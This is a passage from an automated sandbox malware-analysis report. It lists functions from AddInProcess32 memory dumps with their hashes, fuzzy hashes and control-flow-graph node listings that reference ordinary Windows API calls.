                • Opcode ID: 4cde70db630596ca092fb50943b2eb35582d76c718fd379eb530d39be562ac5f
                • Instruction ID: 2bcd6e228f73eb081ebfa07a95ef7d6974e9885ece7eefba4e080dacf7d11b83
                • Opcode Fuzzy Hash: 4cde70db630596ca092fb50943b2eb35582d76c718fd379eb530d39be562ac5f
                • Instruction Fuzzy Hash: D691F374D00218CFEB54DFA9C888BACFBB1FF49310F209259E509AB291DB759A85CF54
                Function 02F6C1F0 Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10ea6aebe7611f53ce5ba209e5831517942936d3393ab51a30b0b14217647bd7
                • Instruction ID: a09fcb00eaf1b035196199fcb5913274f25f9351bcd7ebf440e38d95631a6b88
                • Opcode Fuzzy Hash: 10ea6aebe7611f53ce5ba209e5831517942936d3393ab51a30b0b14217647bd7
                • Instruction Fuzzy Hash: 0191D574E00218CFDB14DFA9D888AADBBF2FF89304F14906AD949AB365DB349941CF54
                Function 06A790A1 Relevance: .2, Instructions: 186COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 292d00f47926014b0d17f8e48476b3bac461d013c53f7d8eb75508d6c7ebd0dc
                • Instruction ID: 396f7f58680134fa43f20512b09c23ab7eca66a1538343dca72d97ccb59b8ed6
                • Opcode Fuzzy Hash: 292d00f47926014b0d17f8e48476b3bac461d013c53f7d8eb75508d6c7ebd0dc
                • Instruction Fuzzy Hash: 1681B274E01218CFDB58DFAAD994BDEBBB2BF89300F20816AD419AB394DB345945CF50
                Function 02F6C4D0 Relevance: .2, Instructions: 186COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d344115395d2a8b89a36b78db252a1f7c3a92614c5db00a951e4cfe8751cb8b
                • Instruction ID: 37eae11d040f58777904c3dfb9e3ad8bf143a72510ce17b24169ba76450a3835
                • Opcode Fuzzy Hash: 9d344115395d2a8b89a36b78db252a1f7c3a92614c5db00a951e4cfe8751cb8b
                • Instruction Fuzzy Hash: 5081A074E002188FDB14DFA9D988AAEBBF2FF88300F14906AD549AB365DB359941CF54
                Function 02F6BF10 Relevance: .2, Instructions: 186COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81405d9c138834643f4d3abebf034b1802b21b587bfe02b264df0ed54ecedd66
                • Instruction ID: ed7e9fd2d97df607c4ab4afe7e2acd3c9976d3d30d2fad5934d75591582abf9b
                • Opcode Fuzzy Hash: 81405d9c138834643f4d3abebf034b1802b21b587bfe02b264df0ed54ecedd66
                • Instruction Fuzzy Hash: 4C81B474E00218DFDB14DFA9D988AADBBF2FF88304F14806AD549AB365DB349941CF50
                Function 02F6CA91 Relevance: .2, Instructions: 185COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b67279a2a0b710eb7476304b513bf0710d7670090241f5d6203a0aa549f4c025
                • Instruction ID: 05fe8888f29c3b67ea9fd7cbe64bd32e99b86e43713a184d49b151aaa2c65e58
                • Opcode Fuzzy Hash: b67279a2a0b710eb7476304b513bf0710d7670090241f5d6203a0aa549f4c025
                • Instruction Fuzzy Hash: 2D81B374E00218CFDB14DFA9D988AADBBF2FF88300F14806AD949AB365DB349941CF50
                Function 02F64B31 Relevance: .2, Instructions: 185COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8d48fbefc1966fe4704f44a75e88d51a3420f894fde391ca76edc58a783ba69
                • Instruction ID: 35ec52aa53eceebef94e8036939e4af3d43a099f9f6b8e244562e8d3a5d876a2
                • Opcode Fuzzy Hash: e8d48fbefc1966fe4704f44a75e88d51a3420f894fde391ca76edc58a783ba69
                • Instruction Fuzzy Hash: BF81B574E00218CFDB14DFA9D948AADBBF2FF89304F149069D909AB365DB349981CF54
                Function 02F6C7B1 Relevance: .2, Instructions: 184COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e820a7f3c78aebcd1cba62ce7c01043bb811aa620328f81d719041862b842a1
                • Instruction ID: a34db15873f5526529b04c468e6a2b59ad80bb3766c4113d2ed3c9cdf747af0e
                • Opcode Fuzzy Hash: 3e820a7f3c78aebcd1cba62ce7c01043bb811aa620328f81d719041862b842a1
                • Instruction Fuzzy Hash: 1D81B074E002188FDB14DFAAD898BADBBF2FF88300F14906AD549AB365DB349941CF50
                Function 02F6BC32 Relevance: .2, Instructions: 184COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 388ef949ab8db502525b79aa886afadc8ad2514b7550c0373f3f0fa2e4a2f480
                • Instruction ID: 141c9344c90d374d196bca96e3754c6f37481753ac67947ac24973be2c1da477
                • Opcode Fuzzy Hash: 388ef949ab8db502525b79aa886afadc8ad2514b7550c0373f3f0fa2e4a2f480
                • Instruction Fuzzy Hash: 04819374E00218CFDB14DFAAD998AADBBF2FF88304F149069D509AB365DB749981CF50
                Function 06A7B4E0 Relevance: .2, Instructions: 173COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0767f9b4189ef3f6f2108a9d38401fd00a5a46632620101460fcc7e5a49284b1
                • Instruction ID: 67789b3ea90986502a7e293f65665418456a37990885cd08635d724e7449b049
                • Opcode Fuzzy Hash: 0767f9b4189ef3f6f2108a9d38401fd00a5a46632620101460fcc7e5a49284b1
                • Instruction Fuzzy Hash: CB7197B1E016188FEB68DF6AC94479DFBF2AF89300F14C1AAD40DA7254DB344A85CF50
                Function 06A7AE98 Relevance: .2, Instructions: 168COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c6379dcd4a0232ea2e56e810654e594df6db113594ee5e5cb45a1b1d54db458
                • Instruction ID: f8b31cfb1164b2c81d7b06be12578ef41a0a4aaab80ec12797e9adfcc24d9724
                • Opcode Fuzzy Hash: 2c6379dcd4a0232ea2e56e810654e594df6db113594ee5e5cb45a1b1d54db458
                • Instruction Fuzzy Hash: 4E7187B1D016288FEB68DF6AC944B9DBBF2AF89300F14C1AAD50DA7255DB344A85CF50
                Function 06A7D468 Relevance: .2, Instructions: 167COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d40923dc3397969893c821e0a506f2bb0c0857ca885299785f428bd865dccb90
                • Instruction ID: 9a845bb52cbffff697020eb0477833235ab067c81c8858baa089be64cde81081
                • Opcode Fuzzy Hash: d40923dc3397969893c821e0a506f2bb0c0857ca885299785f428bd865dccb90
                • Instruction Fuzzy Hash: AB718471E016288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7254DB345A85CF51
                Function 02F6B552 Relevance: .2, Instructions: 152COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b2723392a76a6e651c13519e267542c02011c0e12962080c17a4c29dff005df
                • Instruction ID: ff9ac0c9b9393a6a8b8729cb54410c7d74c94cdb17763eecbd97be8e166a2c68
                • Opcode Fuzzy Hash: 5b2723392a76a6e651c13519e267542c02011c0e12962080c17a4c29dff005df
                • Instruction Fuzzy Hash: 2161B474E006188FDB18DFAAD948AAEBBF2FF88344F148069D519AB365DB349941CF50
                Function 06A78A48 Relevance: .1, Instructions: 122COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff60cc620072668e291a5a0d952ee37762e58f112ee38010ee87e9e9a5058019
                • Instruction ID: 1190ae6aaaabd0ff29de0f91f94c61701fb1ce5286ecdd4c0da2f25ca01f9a14
                • Opcode Fuzzy Hash: ff60cc620072668e291a5a0d952ee37762e58f112ee38010ee87e9e9a5058019
                • Instruction Fuzzy Hash: C341D3B0D012088BEB58DFAAD9447DEFBF6AF88300F24C169D418AB294DB754946CF64
                Function 06A7A848 Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 474580befd2ca51f842bdd317a3322fee40a6b6de9815f6452eb10e66d8e08c5
                • Instruction ID: 64aa12331d77c8804f52f4b14784534e80590e914507e341e09b64fb6b3549e8
                • Opcode Fuzzy Hash: 474580befd2ca51f842bdd317a3322fee40a6b6de9815f6452eb10e66d8e08c5
                • Instruction Fuzzy Hash: 6B4177B1E016189BEB58CF6BDD457DAFAF3AFC9200F14C1AAD50CA6254DB7409868F50
                Function 06A7C178 Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 00549d95c6c0a9e7ae1aa07a55ad17a7393c1f02ff9987a7b6aa023c88d83982
                • Instruction ID: 153282ffee4d2b73dcb012141279c94b29c459483fb368e0b00765da0a25900d
                • Opcode Fuzzy Hash: 00549d95c6c0a9e7ae1aa07a55ad17a7393c1f02ff9987a7b6aa023c88d83982
                • Instruction Fuzzy Hash: AF415871E016588BEB58CF6BDD457CAFAF3AFC9210F04C1AAD50CA6255DB740A868F50
                Function 06A7BB27 Relevance: .1, Instructions: 111COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 73c04cb2b914a5cbc1acfe0be4f01df5437d30185f3fedaed641cf90207e2ba9
                • Instruction ID: b17229dd00ab42b5584cac97aa0a3dce815ec76a293e6d60b7cf724eef2d0f9d
                • Opcode Fuzzy Hash: 73c04cb2b914a5cbc1acfe0be4f01df5437d30185f3fedaed641cf90207e2ba9
                • Instruction Fuzzy Hash: A8416C71D016188BEB58CF6BDD557DAFAF3AFC9300F04C1AAC50CA6255DB740A858F51
                Function 06A7C7CA Relevance: .1, Instructions: 110COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 211ec7bc4f8a31ad928204299e84582782ef8126d06021f9fb4b4041dec64fb9
                • Instruction ID: 5d0a1b43e7ea64b5ff71b1d8d6d2ff8c4e5b75d7d6583bfcf1f525ab2c0f9013
                • Opcode Fuzzy Hash: 211ec7bc4f8a31ad928204299e84582782ef8126d06021f9fb4b4041dec64fb9
                • Instruction Fuzzy Hash: 26416971E016188BEB58CF6BDD457DAFAF3AFC9310F14C1AAC50CA6264DB740A868F51
                Function 06A7DAAF Relevance: .1, Instructions: 108COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f5a9ab29fafac8fb7c27d632268028dfdf72442640f3fe7cff5e82de26f782d
                • Instruction ID: 90b85f223f3745ebaa4b7998568ddccf4319cc3730d450266ee0d59aff2c91c5
                • Opcode Fuzzy Hash: 4f5a9ab29fafac8fb7c27d632268028dfdf72442640f3fe7cff5e82de26f782d
                • Instruction Fuzzy Hash: 364157B1D016188BEB58DF6BDD457DAFAF3AFC9300F14C1AAC50CA6264DB740A868F51
                Function 06A7CE21 Relevance: .1, Instructions: 105COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 233ccf0f36f14c86b7465e24b8c35845d046ca75f5d2fd133e10a2b782177bdc
                • Instruction ID: 2b456213f209c499c0bd4bc8fffafc24a10b92b6caefff9007a7aeadebc96a40
                • Opcode Fuzzy Hash: 233ccf0f36f14c86b7465e24b8c35845d046ca75f5d2fd133e10a2b782177bdc
                • Instruction Fuzzy Hash: 4C4147B1D016188BEB58CF6BDD457D9FAF3AFC9310F14C1AAD50CA6264EB740A868F50
                Function 014FF5F2 Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1063 14ff5f2-14ff5f9 1064 14ff64c-14ff65d 1063->1064 1065 14ff5fb-14ff603 1063->1065 1066 14ff6af-14ff6b1 1064->1066 1067 14ff65f-14ff691 1064->1067 1069 14ff704-14ff723 1066->1069 1070 14ff6b3-14ff6d1 1066->1070 1072 14ff6e4-14ff6f0 1067->1072 1073 14ff693-14ff6a4 1067->1073 1074 14ff724-14ff72e 1069->1074 1070->1074 1075 14ff6d3-14ff6e2 1070->1075 1076 14ff76e-14ff79b 1072->1076 1077 14ff6f2-14ff6ff 1072->1077 1073->1066 1078 14ff738-14ff749 1074->1078 1079 14ff730 call 14fd84c 1074->1079 1075->1072 1082 14ff79c-14ff7b6 1076->1082 1077->1069 1078->1082 1083 14ff74b-14ff76d 1078->1083 1085 14ff735-14ff736 1079->1085 1086 14ff7b8-14ff7be 1082->1086 1087 14ff7c1-14ff7c8 1082->1087 1083->1076 1086->1087 1088 14ff7ca-14ff7d0 1087->1088 1089 14ff7d3-14ff872 CreateWindowExW 1087->1089 1088->1089 1091 14ff87b-14ff8b3 1089->1091 1092 14ff874-14ff87a 1089->1092 1096 14ff8b5-14ff8b8 1091->1096 1097 14ff8c0 1091->1097 1092->1091 1096->1097 1098 14ff8c1 1097->1098 1098->1098
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b027ca51e745689bcfa756684c477713519d56ac2e14af3889fea8c7a2ea59f2
                • Instruction ID: 781bedc3810b95d02a35a686cdb5986f3c1720e559c6253d1249c938fdd4be0f
                • Opcode Fuzzy Hash: b027ca51e745689bcfa756684c477713519d56ac2e14af3889fea8c7a2ea59f2
                • Instruction Fuzzy Hash: 42917CB2C093899FDB16CFA5C84498DBFB1BF49310F15819FE544AB262D335984ACF61
                Function 014FD168 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1099 14fd168-14fd177 1100 14fd179-14fd186 call 14fc100 1099->1100 1101 14fd1a3-14fd1a7 1099->1101 1108 14fd19c 1100->1108 1109 14fd188 1100->1109 1102 14fd1bb-14fd1fc 1101->1102 1103 14fd1a9-14fd1b3 1101->1103 1110 14fd1fe-14fd206 1102->1110 1111 14fd209-14fd217 1102->1111 1103->1102 1108->1101 1154 14fd18e call 14fd3f1 1109->1154 1155 14fd18e call 14fd400 1109->1155 1110->1111 1112 14fd23b-14fd23d 1111->1112 1113 14fd219-14fd21e 1111->1113 1115 14fd240-14fd247 1112->1115 1116 14fd229 1113->1116 1117 14fd220-14fd227 call 14fc10c 1113->1117 1114 14fd194-14fd196 1114->1108 1118 14fd2d8-14fd398 1114->1118 1121 14fd249-14fd251 1115->1121 1122 14fd254-14fd25b 1115->1122 1119 14fd22b-14fd239 1116->1119 1117->1119 1149 14fd39a-14fd39d 1118->1149 1150 14fd3a0-14fd3cb GetModuleHandleW 1118->1150 1119->1115 1121->1122 1123 14fd25d-14fd265 1122->1123 1124 14fd268-14fd271 call 14f5880 1122->1124 1123->1124 1130 14fd27e-14fd283 1124->1130 1131 14fd273-14fd27b 1124->1131 1132 14fd285-14fd28c 1130->1132 1133 14fd2a1-14fd2ae 1130->1133 1131->1130 1132->1133 1135 14fd28e-14fd29e call 14fa074 call 14fc11c 1132->1135 1139 14fd2d1-14fd2d7 1133->1139 1140 14fd2b0-14fd2ce 1133->1140 1135->1133 1140->1139 1149->1150 1151 14fd3cd-14fd3d3 1150->1151 1152 14fd3d4-14fd3e8 1150->1152 1151->1152 1154->1114 1155->1114
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 3798efd2dba3188c8dd782cbf609f66c17138b08b87c013e5f62738644ce4850
                • Instruction ID: 589a10dff7283cfbacfc321c6cb9ef437b39503d2787af98e1e0955d200a5b53
                • Opcode Fuzzy Hash: 3798efd2dba3188c8dd782cbf609f66c17138b08b87c013e5f62738644ce4850
                • Instruction Fuzzy Hash: 2B710570A00B058FE724DFAAD54475ABBF1FF88210F108A2ED64697B50D775E845CB91
                Function 014FD84C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1156 14fd84c-14ff7b6 1158 14ff7b8-14ff7be 1156->1158 1159 14ff7c1-14ff7c8 1156->1159 1158->1159 1160 14ff7ca-14ff7d0 1159->1160 1161 14ff7d3-14ff872 CreateWindowExW 1159->1161 1160->1161 1163 14ff87b-14ff8b3 1161->1163 1164 14ff874-14ff87a 1161->1164 1168 14ff8b5-14ff8b8 1163->1168 1169 14ff8c0 1163->1169 1164->1163 1168->1169 1170 14ff8c1 1169->1170 1170->1170
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014FF862
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: d1149db3524826554c455a449f5ac26d6db8001cef3916366f14386f3dfe2fcd
                • Instruction ID: 042a94242541ec757ef571ed27e4481145c26993fce3cd2ebd4c7c3f0d717108
                • Opcode Fuzzy Hash: d1149db3524826554c455a449f5ac26d6db8001cef3916366f14386f3dfe2fcd
                • Instruction Fuzzy Hash: 3D519DB1D003599FDB14CF9AC884ADEBBB5BF48710F64812AE919AB320D775A845CF90
                Function 06A6BFC4 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1171 6a6bfc4-6a6bfc7 1172 6a6bf79-6a6bf86 1171->1172 1173 6a6bfc9-6a6bffa 1171->1173 1178 6a6bf8f-6a6bf90 1172->1178 1179 6a6bf88 1172->1179 1182 6a6bfff-6a6c00d 1178->1182 1179->1178 1181 6a6bf43-6a6bf55 1179->1181 1183 6a6bf57 1181->1183 1184 6a6bf5e-6a6bf5f 1181->1184 1198 6a6c015-6a6c019 1182->1198 1183->1178 1183->1181 1183->1184 1186 6a6be86-6a6bea6 1183->1186 1187 6a6bf02-6a6bf18 1183->1187 1188 6a6bef3-6a6bf00 1183->1188 1189 6a6bf3d-6a6bf3e 1183->1189 1190 6a6beba-6a6bed0 1183->1190 1191 6a6bea8-6a6beb5 1183->1191 1192 6a6be79-6a6be7f LdrInitializeThunk 1183->1192 1184->1182 1186->1190 1186->1191 1196 6a6bf1f-6a6bf2c 1187->1196 1197 6a6bf1a 1187->1197 1188->1189 1189->1198 1194 6a6bed7-6a6bef1 1190->1194 1195 6a6bed2 1190->1195 1191->1189 1192->1186 1194->1187 1194->1188 1195->1194 1199 6a6bf33-6a6bf3b 1196->1199 1200 6a6bf2e 1196->1200 1197->1196 1201 6a6c021-6a6c02b 1198->1201 1202 6a6c01b-6a6c020 1198->1202 1199->1189 1200->1199 1202->1201
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27f0763542eab4dc8abcc0373cc8f7e775ea1f0d0bc941c6216a2bd4a0f34290
                • Instruction ID: db72c9b9eae64b4549a339f227f796d74e996418b0012a3356a6f5d1ae1cc30b
                • Opcode Fuzzy Hash: 27f0763542eab4dc8abcc0373cc8f7e775ea1f0d0bc941c6216a2bd4a0f34290
                • Instruction Fuzzy Hash: D3413A78904108DFDB44EF9AD484AEDF7B2BF48350F209158E455AB291C771D996CFA0
                Function 06A6BF64 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1204 6a6bf64-6a6bf6e 1205 6a6bf70-6a6bf78 1204->1205 1206 6a6bf7a-6a6bf7d 1204->1206 1205->1206 1207 6a6bf80-6a6bf86 1205->1207 1206->1207 1208 6a6bf8f-6a6bf90 1207->1208 1209 6a6bf88 1207->1209 1211 6a6bfff-6a6c00d 1208->1211 1209->1208 1210 6a6bf43-6a6bf55 1209->1210 1212 6a6bf57 1210->1212 1213 6a6bf5e-6a6bf5f 1210->1213 1226 6a6c015-6a6c019 1211->1226 1212->1208 1212->1210 1212->1213 1214 6a6be86-6a6bea6 1212->1214 1215 6a6bf02-6a6bf18 1212->1215 1216 6a6bef3-6a6bf00 1212->1216 1217 6a6bf3d-6a6bf3e 1212->1217 1218 6a6beba-6a6bed0 1212->1218 1219 6a6bea8-6a6beb5 1212->1219 1220 6a6be79-6a6be7f LdrInitializeThunk 1212->1220 1213->1211 1214->1218 1214->1219 1224 6a6bf1f-6a6bf2c 1215->1224 1225 6a6bf1a 1215->1225 1216->1217 1217->1226 1222 6a6bed7-6a6bef1 1218->1222 1223 6a6bed2 1218->1223 1219->1217 1220->1214 1222->1215 1222->1216 1223->1222 1227 6a6bf33-6a6bf3b 1224->1227 1228 6a6bf2e 1224->1228 1225->1224 1229 6a6c021-6a6c02b 1226->1229 1230 6a6c01b-6a6c020 1226->1230 1227->1217 1228->1227 1230->1229
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0aa3e90f90940b625b655f7f7020a2b67629f8a8daa8808894437530c188d28
                • Instruction ID: fb67b2f9f5dfa3721d74485f76b1a6c85fa64b4bef5c6bde6f2c1ee54f8aba7d
                • Opcode Fuzzy Hash: b0aa3e90f90940b625b655f7f7020a2b67629f8a8daa8808894437530c188d28
                • Instruction Fuzzy Hash: 5A4127B8D04208CFDB44DF9AD084AEDF7B2BF48314F248158E405AB2A1C731A996CFA0
                Function 06A6BE18 Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1252 6a6be18-6a6be4e 1253 6a6be55-6a6be7f LdrInitializeThunk 1252->1253 1254 6a6be50 1252->1254 1256 6a6be86-6a6bea6 1253->1256 1254->1253 1257 6a6beba-6a6bed0 1256->1257 1258 6a6bea8-6a6beb5 1256->1258 1259 6a6bed7-6a6bef1 1257->1259 1260 6a6bed2 1257->1260 1261 6a6bf3d-6a6c019 1258->1261 1262 6a6bf02-6a6bf18 1259->1262 1263 6a6bef3-6a6bf00 1259->1263 1260->1259 1267 6a6c021-6a6c02b 1261->1267 1268 6a6c01b-6a6c020 1261->1268 1265 6a6bf1f-6a6bf2c 1262->1265 1266 6a6bf1a 1262->1266 1263->1261 1269 6a6bf33-6a6bf3b 1265->1269 1270 6a6bf2e 1265->1270 1266->1265 1268->1267 1269->1261 1270->1269
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b9093bc6407793a78a742aa2734aa26708036365c8cafab3f375812702aa4b77
                • Instruction ID: 185009be7076ef3a0dd3cfe7c8bf89c4cffffc9144dd7812151ef000e8b49c90
                • Opcode Fuzzy Hash: b9093bc6407793a78a742aa2734aa26708036365c8cafab3f375812702aa4b77
                • Instruction Fuzzy Hash: 7E216DB1D012089BEB14DFAAD884BEEFBF6EF89310F149129E514B7291C7704946CB50
                Function 014F4834 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1272 14f4834-14f4e44 DuplicateHandle 1274 14f4e4d-14f4e6a 1272->1274 1275 14f4e46-14f4e4c 1272->1275 1275->1274
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014F4D76,?,?,?,?,?), ref: 014F4E37
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
